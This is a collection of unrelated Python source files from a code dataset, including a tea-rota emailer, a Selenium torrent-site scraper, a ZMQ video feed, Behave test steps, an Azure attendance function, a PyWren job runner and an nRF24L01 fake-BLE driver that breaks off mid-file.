self.noInvolved):\n\t\t\tself.luckyOnesNames.append(self.person[self.theNumberList[x]].name)\n\t\t\tself.luckyOnesEmails.append(self.person[self.theNumberList[x]].email)\n\t\t#Finally, incremement the chosen values of thoses chosen and SAVE\n\t\tsys.exit()\n\t\t\n\tdef handleTheList(self):\n\t\t\"\"\"Function to handle the quantity of chosen or not chosen, depending on list size\"\"\"\n\t\tif self.noInvolved == 2:\n\t\t\ttoBeChosen = 1\n\t\telif self.noInvolved == 3:\n\t\t\ttoBeChosen = 2\n\t\telif self.noInvolved == 4:\n\t\t\ttoBeChosen = 2\n\t\telif self.noInvolved == 5:\n\t\t\ttoBeChosen = 3\n\t\telif self.noInvolved == 6:\n\t\t\ttoBeChosen = 3\n\t\telif self.noInvolved == 7:\n\t\t\ttoBeChosen = 3\n\t\telif self.noInvolved == 8:\n\t\t\ttoBeChosen = 4\n\t\telif self.noInvolved < 2:\n\t\t\tprint(\"Not Enough participants! Minimum of 1.\")\n\t\t\tsys.exit()\n\t\telif self.noInvolved > 8:\n\t\t\tprint(\"Too many participants! Maximum of 8\")\n\t\t\tsys.exit()\n\t\telse:\n\t\t\tprint(\"A fatal error occurred!\")\n\t\t\tsys.exit()\n\t\treturn toBeChosen\n\nclass person():\n\tdef __init__(self, name):\n\t\t\"\"\"Init function for person, determines their email address and name\"\"\"\n\t\tself.email = \"\"\n\t\tdirList = os.listdir(\"./\")\n\t\tself.name = str(name).lower()\n\t\tif (self.name + \".txt\") in dirList:\n\t\t\t#Then open file and load profile\n\t\t\tuserContents = open(str(self.name + \".txt\"), \"r\")\n\t\t\tuserContents = userContents.readlines()\n\t\t\tself.email = str(userContents[1].rstrip())\n\t\t\tself.timesChosen = int(userContents[2].rstrip())\n\t\t\tprint(self.email, self.timesChosen)\n\t\telse:\n\t\t\t#Otherwise create a profile\n\t\t\tchoice = raw_input(\"\\nProfile for %s does not exist, create one?[yn]\" % self.name)\n\t\t\twhile choice.lower() != \"y\" and choice.lower() != \"n\":\n\t\t\t\tprint(\"Invalid option! please enter 'y' or 'n'\")\n\t\t\t\ttime.sleep(1)\n\t\t\t\tchoice = raw_input(\"\\nProfile for %s does not exist, create one?[yn]\" % self.name)\n\t\t\tif choice == 'y':\n\t\t\t\ttime.sleep(1)\n\t\t\t\tself.timesChosen = 0\n\t\t\t\tself.email = raw_input(\"%s's email: \" % self.name)\n\t\t\t\tself.profileSave()\n\t\t\t\ttime.sleep(1)\n\t\t\t\tprint(\"Profile Created successfully!\\n\")\n\n\n\tdef profileSave(self):\n\t\t\"\"\"Function to create a user's profile\"\"\"\n\t\tprint(\"SAVING!\")\n\t\tnewUser = open(\"./%s.txt\" % self.name, \"w\")\n\t\tnewUser.write(\"%s\\n%s\\n%s\" % (self.name, self.email, self.timesChosen)) \n\t\t\n\t\t\n\n\tdef __str__(self):\n\t\t\"\"\"Function to print the name\"\"\"\n\t\treturn str(self.name + \" \" + self.email)\n\nclass sendTheMail():\n\t\"\"\"Class to send the mail\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"init function, define variables\"\"\"\n\t\tself.server = \"exch-01\"\n\t\tself.sender = \"matt.sutton@satisnet.co.uk\"\t\n\t\tself.defineEmail()\n\t\tprint(self.unluckyEmail)\n\t\tprint(self.luckyEmail)\n\t\n\tdef defineEmail(self):\n\t\t\"\"\"Function to define the email contents\"\"\"\n\t\tself.subject = \"TEA\"\n\t\tself.unluckyText = \"Unlucky!! You have been chosen.\\n\\n\"\n\t\tfor x in range(choosing.toBeChosen):\n\t\t\tself.unluckyText = self.unluckyTest + \"Tea Maker %s: %s\" % (x,choosing.teaMakersNames[x])\n\t\tprint(self.unluckyText)\n\t\tsys.exit()\n\t\t\t\n\t\tself.unluckyText = \"Unlucky!! You have been chosen.\\n\\nFirst Maker: %s.\\nSecond Maker: %s.\\nThird Maker: %s.\\nFirst Winner: %s.\\nSecond Winner: %s.\\nThird Winner %s.\\n\\nTotal Times Chosen:\\nAndy = %i.\\nMatt = %i.\\nBarney = %i.\\nScott = %i.\\nConnor = %i.\\nHaydn = %i\\n\\n\" % (self.chosenNames[0], self.chosenNames[1], self.chosenNames[2], self.chosenNames[3], self.chosenNames[4], self.chosenNames[5], choosing.Andy.timesChosen, choosing.Matt.timesChosen, choosing.Barney.timesChosen, choosing.Scott.timesChosen, choosing.Connor.timesChosen, choosing.Haydn.timesChosen)\t\t\t\n\t\tself.luckyText = \"Congratulations!! You have NOT been chosen.\\n\\nFirst Maker: %s.\\nSecond Maker: %s.\\nThird Maker: %s.\\nFirst Winner: %s.\\nSecond Winner: %s.\\nThird Winner %s.\\n\\nTotal Times Chosen:\\nAndy = %i.\\nMatt = %i.\\nBarney = %i.\\nScott = %i.\\nConnor = %i.\\nHaydn = %i\\n\\n\" % (self.chosenNames[0], self.chosenNames[1], self.chosenNames[2], self.chosenNames[3], self.chosenNames[4], self.chosenNames[5], choosing.Andy.timesChosen, choosing.Matt.timesChosen, choosing.Barney.timesChosen, choosing.Scott.timesChosen, choosing.Connor.timesChosen, choosing.Haydn.timesChosen)\t\t\t\n\t\treturn self.unluckyText, self.luckyText\n\n\tdef sendIt(self):\n\t\t\"\"\"Function to send the emails\"\"\"\n\t\tprint(self.addresses)\n\t\t\n\n\"\"\"Commence main program\"\"\"\nwhile 1:\n\tchoosing = chooseTheMakers()\n\thandleTheTime()\n","sub_path":"theScript.py","file_name":"theScript.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"505686209","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport re, os, urllib, logging\nimport argparse\nfrom ToolBox import Utils\n\n\nclass YTS(object):\n\n def __init__(self):\n profile = webdriver.FirefoxProfile()\n profile.set_preference('permissions.default.image', 2)\n profile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')\n profile.set_preference('javascript.enable', 'false')\n self.driver = webdriver.Firefox(firefox_profile=profile)\n self.driver.implicitly_wait(30)\n self.base_url = \"https://yts.am/\"\n self.verificationErrors = []\n self.accept_next_alert = True\n logging.basicConfig(filename='ytsruntime.log', level=logging.DEBUG)\n self.logger = logging.getLogger(\"YTS\")\n\n def get_href(self):\n driver = self.driver\n elements = driver.find_elements_by_xpath(\"//a[@href]\")\n href_list = list()\n for elem in elements:\n href_list.append(elem.get_attribute(\"href\"))\n return href_list\n\n def result_links(self):\n hrefs = self.get_href()\n regex = re.compile(r'https://yts\\.am/movie/.*')\n selection = filter(regex.search, hrefs)\n linkset = set(selection)\n return linkset\n\n def imdb_link(self):\n hrefs = self.get_href()\n regex = re.compile(r'https://www\\.imdb\\.com/title/.*/$')\n selection = filter(regex.search, hrefs)\n linkset = set(selection)\n return linkset.pop()\n\n def torrent_links(self):\n hrefs = self.get_href()\n regex = re.compile(r'https://yts\\.am/torrent/download/.*$')\n selection = filter(regex.search, hrefs)\n linkset = set(selection)\n return linkset\n\n def magnet_links(self):\n hrefs = self.get_href()\n regex = re.compile(r'magnet:\\?xt=urn:btih:.*')\n selection = filter(regex.search, hrefs)\n linkset = set(selection)\n return linkset\n\n def search(self,term):\n util = Utils()\n driver = self.driver\n uri = self.base_url + \"browse-movies/\" + urllib.quote_plus(term)\n self.logger.info(\"Opening \" + uri)\n driver.get(uri)\n xpath = \"//h2\"\n\n try:\n results = driver.find_element_by_xpath(xpath).text\n self.logger.info(results)\n number = util.get_first(results)\n self.logger.debug(number + \" results\")\n if (number > 0):\n self.logger.info(\"Getting results metadata\")\n return self.result_links()\n except NoSuchElementException as e:\n self.logger.error(\"Error getting element \" + xpath)\n\n @staticmethod\n def magnet_name(uri):\n regex = re.compile(r'dn=(.*?)&')\n match = regex.search(uri).group(1)\n return urllib.unquote(\n urllib.unquote(match))\n\n @staticmethod\n def magnet_hash(uri):\n regex = re.compile(r'btih:(.*?)&')\n match = regex.search(uri).group(1)\n return match\n\n @staticmethod\n def year(name_field):\n regex = re.compile(r'\\((.*?)\\)')\n match = regex.search(name_field).group(1)\n return match\n\n @staticmethod\n def res(name_field):\n regex = re.compile(r'\\[(.*?)\\]')\n match = regex.search(name_field).group(1)\n return match\n\n @staticmethod\n def name(name_field):\n regex = re.compile(r'^(.*?)\\(')\n match = regex.search(name_field).group(1)\n utils = Utils()\n s = utils.char_espace(match, \"+\")\n return s.strip()\n\n def name_split(self, name_field):\n hashdict = {\n 'name': self.name(name_field),\n 'year': self.year(name_field),\n 'resolution': self.res(name_field)\n }\n return hashdict\n\n def magnet_named(self):\n magnets = self.magnet_links()\n dictio = {}\n for magnet in magnets:\n name_field = self.magnet_name(magnet)\n hash_field = self.magnet_hash(magnet)\n torrent_link = \"https://yts.am/torrent/download/\" + hash_field.upper()\n dictio[hash_field] = {\n 'link': torrent_link,\n 'name': self.name(name_field),\n 'year': self.year(name_field),\n 'resolution': self.res(name_field),\n 'magnetlink': magnet\n }\n return dictio\n\n def get_movie(self, uri):\n driver = self.driver\n driver.get(uri)\n try:\n metadata = {\n 'imdb' : self.imdb_link()\n }\n metadata.update(self.magnet_named())\n return metadata\n except NoSuchElementException as e:\n self.logger.error(\"Error getting elements\")\n\n def quit(self):\n self.driver.quit()\n\n def query(self,args):\n links = self.search(args)\n allmetadata = {}\n result_index = 0\n for link in links:\n allmetadata[result_index] = {\n 'YTS': link,\n 'meta': self.get_movie(link)\n }\n result_index += 1\n\n self.quit()\n return allmetadata\n\n\n def __del__(self):\n self.quit()\n\n","sub_path":"Scraper/YTS.py","file_name":"YTS.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"78162184","text":"\nfrom utils_base_classes import TemplateCollection\nfrom urls import reverse_api\n\nUPLOADER_JS = u\"\"\"\n\n\"\"\"\n\nUPLOADER_HTML = u\"\"\"\n\n
      \n\t\n
      \n\n\n\n\"\"\"\n\nclass ViewTemplateCollection(TemplateCollection):\n\ttemplate = UPLOADER_HTML\n\n\n\tdef context(self, uploader):\n\t\treturn dict(\n\t\t\tscript_js=UPLOADER_JS\n\t\t)\n\n","sub_path":"Libraries/template_uploader.py","file_name":"template_uploader.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"456605350","text":"\"\"\"\nModels\n\"\"\"\n\nimport logging\nimport socket\nimport threading\nimport time\n\nimport cv2\nimport numpy as np\nimport zmq\n\nfrom vision_on_edge.azure_app_insight.utils import get_app_insight_logger\nfrom vision_on_edge.azure_iot.utils import is_edge\nfrom vision_on_edge.azure_settings.models import Setting\n\nlogger = logging.getLogger(__name__)\n\n\ndef inference_url():\n if is_edge():\n ip = socket.gethostbyname('InferenceModule')\n return 'tcp://' + ip + ':5558'\n return 'tcp://localhost:5558'\n\n\nclass VideoFeed():\n \"\"\"VideoFeed.\n \"\"\"\n\n def __init__(self):\n self.keep_alive = time.time()\n self.last_active = time.time()\n self.context = zmq.Context()\n self.mutex = threading.Lock()\n self.is_opened = True\n self.receiver = self.context.socket(zmq.PULL)\n\n def gen(self):\n \"\"\"gen\n\n video feed genarator\n \"\"\"\n\n # context = zmq.Context()\n # receiver = context.socket(zmq.PULL)\n self.receiver.connect(inference_url())\n\n while self.is_opened:\n ret = self.receiver.recv_pyobj()\n\n nparr = np.frombuffer(np.array(ret['data']), np.uint8)\n\n # logger.warning('Receive: %s', ret['ts'])\n # logger.warning('Time elapsed: %s', (time.time()-self.keep_alive))\n img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\n # ret2 = receiver.recv_pyobj()\n # logger.warning(ret2['ts'])\n # logger.warning(ret2['shape'])\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n cv2.imencode('.jpg', img)[1].tobytes() + b'\\r\\n')\n self.receiver.close()\n\n def update_keep_alive(self):\n \"\"\"update_keep_alive.\n \"\"\"\n self.keep_alive = time.time()\n\n def close(self):\n \"\"\"close connection\n \"\"\"\n self.is_opened = False\n # self.receiver.close()\n logger.warning('connection close')\n","sub_path":"factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/video_feed/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"410160800","text":"from selenium.webdriver.common.keys import Keys\nimport time\n\n@when(u'I visit \"{url}\"')\ndef visit(context,url):\n context.browser.get(url)\n\n@then(u'I will see the page title mentions \"{expected_title}\"')\ndef see_title_mentions(context,expected_title):\n title = context.browser.title\n context.test.assertIn(expected_title,title)\n\n@then(u'I will see the page header mentions \"{expected_header}\"')\ndef see_header_mentions(context,expected_header):\n header = context.browser.find_element_by_tag_name('h1').text\n context.test.assertIn(expected_header,header)\n\n@then(u'I will see a text box and will be prompted to input \"{expected_prompt}\"')\ndef see_text_box_with_ptompt(context,expected_prompt):\n inputbox = context.browser.find_element_by_id('id_new_item')\n placeholder = inputbox.get_attribute('placeholder')\n context.test.assertEqual(placeholder,expected_prompt)\n\n@when(u'I type \"{text_input}\" into a text box and press enter')\ndef type_text_and_press_enter(context,text_input):\n inputbox = context.browser.find_element_by_id('id_new_item')\n inputbox.send_keys(text_input)\n inputbox.send_keys(Keys.ENTER)\n time.sleep(1)\n\n@then(u'I will see the row lists \"{expected_item}\" item in a table')\ndef see_item_in_table(context,expected_item):\n table = context.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n context.test.assertIn(expected_item,[row.text for row in rows])\n\n@given(u'I have typed \"{text_input}\" into a text box and press enter')\ndef typed_text_input(context,text_input):\n inputbox = context.browser.find_element_by_id('id_new_item')\n inputbox.send_keys(text_input)\n inputbox.send_keys(Keys.ENTER)\n time.sleep(1)\n\n","sub_path":"features/steps/my_list.py","file_name":"my_list.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"110932525","text":"import sys\nimport os\nsys.path.append(os.path.abspath(\"\"))\n\nimport logging, json\nimport azure.functions as func\nfrom datetime import datetime\nfrom .config import DATE_FORMAT, DATETIME_FORMAT\nfrom .controllers import EmployeeAttendanceController\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info('Python HTTP trigger function processed a request.')\n req_body = req.get_json()\n\n if req_body:\n\n try:\n employee_attendance_controller = EmployeeAttendanceController()\n for time_log in req_body:\n log_no = time_log['log_no']\n employee_id = time_log['employee_id']\n employee_name = time_log['employee_name']\n date = time_log['date']\n time_logged = time_log['time_logged']\n employee_attendance_controller.put_data(log_no, employee_id, \n employee_name, date, time_logged)\n employee_attendance_records = employee_attendance_controller.get_attendance_records() \n response = serialize_response(employee_attendance_records)\n return response\n except Exception as e:\n error_msg = str(repr(e))\n logging.error(error_msg)\n return json.dumps({'status' : 'error', 'status_description': repr(e)})\n else:\n return json.dumps({\n 'status' : 'ok',\n 'description' : 'Please send a request containing the time logs.'})\n\ndef serialize_response(attendance_records):\n def get_json_time_logs(daily_record):\n time_logs = []\n for time_log in daily_record.time_logs:\n json_tl = {\n 'time_in' : datetime.strftime(time_log.time_in, DATETIME_FORMAT)[11:],\n 'time_out' : \n datetime.strftime(time_log.time_out, DATETIME_FORMAT)[11:] if \n time_log.time_out else ''}\n time_logs.append(json_tl)\n return time_logs\n\n def get_json_daily_records(attendance_record):\n daily_records = []\n for daily_record in attendance_record.daily_records:\n json_dr = {\n 'date' : datetime.strftime(daily_record.date, DATE_FORMAT),\n 'hours_worked' : round(daily_record.get_hours_worked(), 2),\n 'time_logs' : get_json_time_logs(daily_record)}\n daily_records.append(json_dr)\n return daily_records\n\n def get_json_attendance_records(attendance_records):\n return_attendance_records = []\n for attendance_record in attendance_records:\n json_ar = {\n 'employee_id' : attendance_record.employee_id,\n 'employee_name' : attendance_record.employee_name,\n 'from_date' : datetime.strftime(attendance_record.get_from_date(), DATE_FORMAT),\n 'to_date' : datetime.strftime(attendance_record.get_to_date(), DATE_FORMAT),\n 'total_hours_worked' : round(attendance_record.get_total_hours_worked(), 2),\n 'daily_records' : get_json_daily_records(attendance_record)}\n return_attendance_records.append(json_ar)\n return json.dumps(return_attendance_records)\n logging.info('Returning response with %d records.' % (len(attendance_records)))\n return get_json_attendance_records(attendance_records)","sub_path":"HR Functions/GenerateEmployeeAttendanceRecords/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"590361667","text":"from __future__ import print_function\n\nimport base64\nimport json\nimport sys\nimport traceback\n\nfrom six.moves import cPickle as pickle\nfrom tblib import pickling_support\n\npickling_support.install()\n\ndef b64str_to_bytes(str_data):\n str_ascii = str_data.encode('ascii')\n byte_data = base64.b64decode(str_ascii)\n return byte_data\n\ntry:\n func_filename = sys.argv[1]\n data_filename = sys.argv[2]\n out_filename = sys.argv[3]\n # initial output file in case job fails\n pickle.dump({'result' : None,\n 'success' : False},\n open(out_filename, 'wb'), -1)\n\n print(\"loading\", func_filename, data_filename, out_filename)\n func_b64 = b64str_to_bytes(json.load(open(func_filename, 'r'))['func'])\n loaded_func = pickle.loads(func_b64)\n loaded_data = pickle.load(open(data_filename, 'rb'))\n print(\"loaded\")\n y = loaded_func(loaded_data)\n print(\"success\")\n pickle.dump({'result' : y,\n 'success' : True,\n 'sys.path' : sys.path},\n open(out_filename, 'wb'), -1)\n\n\nexcept Exception as e:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback)\n\n # Shockingly often, modules like subprocess don't properly\n # call the base Exception.__init__, which results in them\n # being unpickleable. As a result, we actually wrap this in a try/catch block\n # and more-carefully handle the exceptions if any part of this save / test-reload\n # fails\n\n try:\n with open(out_filename, 'wb') as fid:\n pickle.dump({'result' : e,\n 'exc_type' : exc_type,\n 'exc_value' : exc_value,\n 'exc_traceback' : exc_traceback,\n 'sys.path' : sys.path,\n 'success' : False}, fid, -1)\n\n # this is just to make sure they can be unpickled\n pickle.load(open(out_filename, 'rb'))\n\n except Exception as pickle_exception:\n pickle.dump({'result' : str(e),\n 'exc_type' : str(exc_type),\n 'exc_value' : str(exc_value),\n 'exc_traceback' : exc_traceback,\n 'exc_traceback_str' : str(exc_traceback),\n 'sys.path' : sys.path,\n 'pickle_fail' : True,\n 'pickle_exception' : pickle_exception,\n 'success' : False},\n open(out_filename, 'wb'), -1)\n","sub_path":"pywren/jobrunner.py","file_name":"jobrunner.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"103510449","text":"# The MIT License (MIT)\n#\n# Copyright (c) 2019 Brendan Doherty\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\"\"\"Original research was done by `Dmitry Grinberg and his write-up can be\nfound here `_\"\"\"\nfrom os import urandom\nimport struct\nfrom .rf24 import RF24\n\n\ndef swap_bits(original):\n \"\"\"This function reverses the bit order for a single byte.\"\"\"\n original &= 0xFF\n reverse = 0\n for _ in range(8):\n reverse <<= 1\n reverse |= original & 1\n original >>= 1\n return reverse\n\n\ndef reverse_bits(original):\n \"\"\"This function reverses the bit order for an entire\n buffer protocol object.\"\"\"\n ret = bytearray(len(original))\n for i, byte in enumerate(original):\n ret[i] = swap_bits(byte)\n return ret\n\n\ndef chunk(buf, data_type=0x16):\n \"\"\"This function is used to pack data values into a block of data that\n make up part of the BLE payload per Bluetooth Core Specifications.\"\"\"\n return bytearray([len(buf) + 1, data_type & 0xFF]) + buf\n\n\ndef crc24_ble(data, deg_poly=0x65B, init_val=0x555555):\n \"\"\"This function calculates a checksum of various sized buffers.\"\"\"\n crc = init_val\n for byte in data:\n crc ^= swap_bits(byte) << 16\n for _ in range(8):\n if crc & 0x800000:\n crc = (crc << 1) ^ deg_poly\n else:\n crc <<= 1\n crc &= 0xFFFFFF\n return reverse_bits((crc).to_bytes(3, \"big\"))\n\n\nBLE_FREQ = (2, 26, 80,)\n\"\"\"The BLE channel number is different from the nRF channel number.\"\"\"\n\n\nclass FakeBLE(RF24):\n \"\"\"A class to implement BLE advertisements using the nRF24L01.\"\"\"\n\n def __init__(self, spi, csn, ce_pin, spi_frequency=10000000):\n super().__init__(spi, csn, ce_pin, spi_frequency=spi_frequency)\n self._curr_freq = 0\n self._show_dbm = False\n self._ble_name = None\n self._mac = urandom(6)\n self._config = self._config & 3 | 0x10 # disable CRC\n # disable auto_ack, dynamic payloads, all TX features, & auto-retry\n self._aa, self._dyn_pl, self._features, self._retry_setup = (0,) * 4\n self._addr_len = 4 # use only 4 byte address length\n self._tx_address[:4] = b\"\\x71\\x91\\x7D\\x6B\"\n with self:\n self.payload_length = 32\n super().open_rx_pipe(0, b\"\\x71\\x91\\x7D\\x6B\\0\")\n\n def __exit__(self, *exc):\n self._show_dbm = False\n self._ble_name = None\n return super().__exit__()\n\n @property\n def mac(self):\n \"\"\"This attribute returns a 6-byte buffer that is used as the\n arbitrary mac address of the BLE device being emulated.\"\"\"\n return self._mac\n\n @mac.setter\n def mac(self, address):\n if address is None:\n self._mac = urandom(6)\n if isinstance(address, int):\n self._mac = (address).to_bytes(6, \"little\")\n elif isinstance(address, (bytearray, bytes)):\n self._mac = address\n if len(self._mac) < 6:\n self._mac += urandom(6 - len(self._mac))\n\n @property\n def name(self):\n \"\"\"The broadcasted BLE name of the nRF24L01.\"\"\"\n return self._ble_name\n\n @name.setter\n def name(self, n):\n if n is not None:\n if not isinstance(n, (bytes, bytearray)):\n raise ValueError(\"name must be a bytearray or bytes object.\")\n if len(n) > (18 - self._show_dbm * 3):\n raise ValueError(\"name length exceeds maximum.\")\n self._ble_name = n\n\n @property\n def show_pa_level(self):\n \"\"\"If this attribute is `True`, the payload will automatically include\n the nRF24L01's `pa_level` in the advertisement.\"\"\"\n return bool(self._show_dbm)\n\n @show_pa_level.setter\n def show_pa_level(self, enable):\n if enable and len(self.name) > 16:\n raise ValueError(\"there is not enough room to show the pa_level.\")\n self._show_dbm = bool(enable)\n\n def hop_channel(self):\n \"\"\"Trigger an automatic change of BLE compliant channels.\"\"\"\n self._curr_freq += 1 if self._curr_freq < 2 else -2\n self.channel = BLE_FREQ[self._curr_freq]\n\n def whiten(self, data):\n \"\"\"Whitening the BLE packet data ensures there's no long repetition\n of bits.\"\"\"\n data, coef = (bytearray(data), (self._curr_freq + 37) | 0x40)\n for i, byte in enumerate(data):\n res, mask = (0, 1)\n for _ in range(8):\n if coef & 1:\n coef ^= 0x88\n byte ^= mask\n mask <<= 1\n coef >>= 1\n data[i] = byte ^ res\n return data\n\n def _make_payload(self, payload):\n \"\"\"Assemble the entire packet to be transmitted as a payload.\"\"\"\n if self.len_available(payload) < 0:\n raise ValueError(\n \"Payload length exceeds maximum buffer size by \"\n \"{} bytes\".format(abs(self.len_available(payload)))\n )\n name_length = (len(self.name) + 2) if self.name is not None else 0\n pl_size = 9 + len(payload) + name_length + self._show_dbm * 3\n buf = bytes([0x42, pl_size]) + self.mac\n buf += chunk(b\"\\x05\", 1)\n pa_level = b\"\"\n if self._show_dbm:\n pa_level = chunk(struct.pack(\">b\", self.pa_level), 0x0A)\n buf += pa_level\n if name_length:\n buf += chunk(self.name, 0x08)\n buf += payload\n buf += crc24_ble(buf)\n return buf\n\n def len_available(self, hypothetical=b\"\"):\n \"\"\"This function will calculates how much length (in bytes) is\n available in the next payload.\"\"\"\n name_length = (len(self.name) + 2) if self.name is not None else 0\n return 18 - name_length - self._show_dbm * 3 - len(hypothetical)\n\n def advertise(self, buf=b\"\", data_type=0xFF):\n \"\"\"This blocking function is used to broadcast a payload.\"\"\"\n if not isinstance(buf, (bytearray, bytes, list, tuple)):\n raise ValueError(\"buffer is an invalid format\")\n payload = b\"\"\n if isinstance(buf, (list, tuple)):\n for b in buf:\n payload += b\n else:\n payload = chunk(buf, data_type) if buf else b\"\"\n payload = self._make_payload(payload)\n self.send(reverse_bits(self.whiten(payload)))\n\n @property\n def channel(self):\n \"\"\"The only allowed channels are those contained in the `BLE_FREQ`\n tuple.\"\"\"\n return self._channel\n\n @channel.setter\n def channel(self, value):\n if value not in BLE_FREQ:\n raise ValueError(\"channel {} is not a valid BLE frequency\".format(value))\n self._channel = value\n self._reg_write(0x05, value)\n\n # pylint: disable=missing-function-docstring\n @property\n def dynamic_payloads(self):\n raise NotImplementedError(\n \"adjusting dynamic_payloads breaks BLE specifications\"\n )\n\n def set_dynamic_payloads(self, enable, pipe_number=None):\n raise NotImplementedError(\n \"adjusting dynamic_payloads breaks BLE specifications\"\n )\n\n @property\n def data_rate(self):\n raise NotImplementedError(\"adjusting data_rate breaks BLE specifications\")\n\n @property\n def address_length(self):\n raise NotImplementedError(\"adjusting address_length breaks BLE specifications\")\n\n @property\n def auto_ack(self):\n raise NotImplementedError(\"adjusting auto_ack breaks BLE specifications\")\n\n def set_auto_ack(self, enable, pipe_number=None):\n raise NotImplementedError(\"adjusting auto_ack breaks BLE specifications\")\n\n @property\n def ack(self):\n raise NotImplementedError(\"adjusting ack breaks BLE specifications\")\n\n @property\n def crc(self):\n raise NotImplementedError(\"adjusting crc breaks BLE specifications\")\n\n def open_rx_pipe(self, pipe_number, address):\n raise NotImplementedError(\"BLE implementation only uses 1 address on pipe 0\")\n\n def open_tx_pipe(self, address):\n raise NotImplementedError(\"BLE implentation only uses 1 address\")\n\n # pylint: enable=missing-function-docstring\n def print_details(self, dump_pipes=False):\n \"\"\"This debuggung function aggregates and outputs all status/condition\n related information from the nRF24L01.\"\"\"\n print(\"Is a plus variant_________{}\".format(self.is_plus_variant))\n print(\"BLE device name___________{}\".format(str(self.name)))\n print(\"Broadcasting PA Level_____{}\".format(self.show_pa_level))\n print(\n \"Channel___________________{} ~ {} GHz\".format(\n self.channel, (self.channel + 2400) / 1000\n )\n )\n print(\"RF Data Rate______________1 Mbps\")\n print(\"RF Power Amplifier________{} dbm\".format(self.pa_level))\n print(\n \"RF Low Noise Amplifier____{}\".format(\n \"Enabled\" if self.is_lna_enabled else \"Disabled\"\n )\n )\n print(\"CRC bytes_________________3\")\n print(\"Address length____________4 bytes\")\n print(\"TX Payload lengths________{} bytes\".format(self.payload_length))\n print(\"Auto retry delay__________250 microseconds\")\n print(\"Auto retry attempts_______0 maximum\")\n print(\"Re-use TX FIFO____________{}\".format(bool(self._reg_read(0x17) & 64)))\n print(\n \"IRQ on Data Ready__{} Data Ready___________{}\".format(\n \"_Enabled\" if not self._config & 0x40 else \"Disabled\", self.irq_dr\n )\n )\n print(\n \"IRQ on Data Fail___{} Data Failed__________{}\".format(\n \"_Enabled\" if not self._config & 0x10 else \"Disabled\", self.irq_df\n )\n )\n print(\n \"IRQ on Data Sent___{} Data Sent____________{}\".format(\n \"_Enabled\" if not self._config & 0x20 else \"Disabled\", self.irq_ds\n )\n )\n print(\n \"TX FIFO full__________{} TX FIFO empty________{}\".format(\n \"_True\" if self.tx_full else \"False\", self.fifo(True, True)\n )\n )\n print(\n \"RX FIFO full__________{} RX FIFO empty________{}\".format(\n \"_True\" if self.fifo(False, False) else \"False\", self.fifo(False, True)\n )\n )\n print(\n \"Ask no ACK_________{} Custom ACK Payload___Disabled\".format(\n \"_Allowed\" if self.allow_ask_no_ack else \"Disabled\",\n )\n )\n print(\"Dynamic Payloads___Disabled Auto Acknowledgment__Disabled\")\n print(\n \"Primary Mode_____________{} Power Mode___________{}\".format(\n \"RX\" if self.listen else \"TX\",\n (\"Standby-II\" if self.ce_pin.value else \"Standby-I\")\n if self._config & 2\n else \"Off\",\n )\n )\n if dump_pipes:\n self._dump_pipes()\n\n\nclass ServiceData:\n \"\"\"An abstract helper class to package specific service data using\n Bluetooth SIG defined 16-bit UUID flags to describe the data type.\"\"\"\n\n def __init__(self, uuid):\n self._type = struct.pack(\"B\", value)\n\n\nclass UrlServiceData(ServiceData):\n \"\"\"This derivitive of the `ServiceData` class can be used to represent\n URL data as a `bytes` value.\"\"\"\n\n def __init__(self):\n super().__init__(0xFEAA)\n self._type += bytes([0x10]) + struct.pack(\">b\", -25)\n\n @property\n def pa_level_at_1_meter(self):\n \"\"\"The TX power level (in dBm) at 1 meter from the nRF24L01. This\n defaults to -25 (due to testing when broadcasting with 0 dBm) and must\n be a 1-byte signed `int`.\"\"\"\n return struct.unpack(\">b\", self._type[-1:])[0]\n\n @pa_level_at_1_meter.setter\n def 